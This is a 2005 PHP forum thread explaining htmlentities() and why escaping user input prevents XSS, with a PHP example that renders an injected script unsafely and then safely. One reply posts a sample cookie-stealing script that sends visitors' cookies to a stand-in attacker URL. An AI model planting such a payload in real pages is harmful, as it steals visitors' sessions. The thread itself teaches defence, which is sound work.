The HTML Entities Function
Posted: Wed Sep 14, 2005 2:29 pm
by pilau
Htmlentities... right.
Can somebody explain what it does actually?
Why do we need it? In what cases?
TIA
Posted: Wed Sep 14, 2005 2:32 pm
by josh
Turns anything that is a special HTML character into its entity. Entities are like HTML tags that cause HTML to be output "literally" to the browser, so that instead of <b>making text bold</b> you just want the bold HTML tag to output plainly to the screen. It's useful in posting examples of HTML source but is also a security necessity against XSS (allowing other users to 'inject' HTML into your page).
Posted: Fri Sep 16, 2005 12:03 pm
by pilau
Great, thanks mate.
Posted: Mon Sep 19, 2005 8:18 am
by Jenk
An example of HTML injection/XSS attack (Cookie stealing)
Code:
<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
Now if these forums did not use htmlentities (or similar function) then
http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.
But because PHP's htmlentities() replaces '<' with '&lt;' and '>' with '&gt;' (less than and greater than respectively), the code becomes, as jshpro2 pointed out, literal.
There are other characters that are changed as well, " (double quote) for example.
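Added example (not code from anyone in this thread): the payload posted above is rendered into a page body once without and once with htmlentities(), so you can see the script turn into inert text; the two render functions are hypothetical names chosen for this example.

```php
<?php
// Constructed sample input: the cookie-stealing snippet from the post above,
// exactly as a user would paste it into a forum message.
$untrusted = '<script language="JavaScript">'
    . "window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);"
    . '</script>';

// Vulnerable: the body is echoed straight into the page, so every viewer's
// browser parses the <script> element and runs it.
function render_unsafe(string $body): string {
    return '<div class="post">' . $body . '</div>';
}

// Fixed: each HTML-significant character (<, >, &, ", and with ENT_QUOTES
// also ') becomes its entity, so the browser displays the text literally.
// The charset argument must match the page's actual encoding.
function render_safe(string $body): string {
    return '<div class="post">' . htmlentities($body, ENT_QUOTES, 'UTF-8') . '</div>';
}

// Helper for the check below: does the rendered output still contain a raw tag?
function contains_raw_tag(string $html, string $tag): bool {
    return stripos($html, '<' . $tag) !== false;
}

$unsafe = render_unsafe($untrusted);
$safe   = render_safe($untrusted);

echo $unsafe, PHP_EOL;   // contains a live <script> element
echo $safe, PHP_EOL;     // begins: <div class="post">&lt;script language=&quot;JavaScript&quot;&gt;

// The wrapper's own <div> is the only tag left; the user-supplied <script> is gone.
var_dump(contains_raw_tag($unsafe, 'script'));  // bool(true)
var_dump(contains_raw_tag($safe, 'script'));    // bool(false)
var_dump(contains_raw_tag($safe, 'div'));       // bool(true)

// Caveat: htmlentities() is the right tool for text between tags and for quoted
// attribute values. A value placed inside a <script> block, an unquoted attribute
// or a URL needs the encoding rules of that context instead.
```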
Posted: Mon Sep 19, 2005 9:11 am
by pilau
Cool, thank you.
Posted: Tue Sep 20, 2005 7:56 am
by $var
that's fun.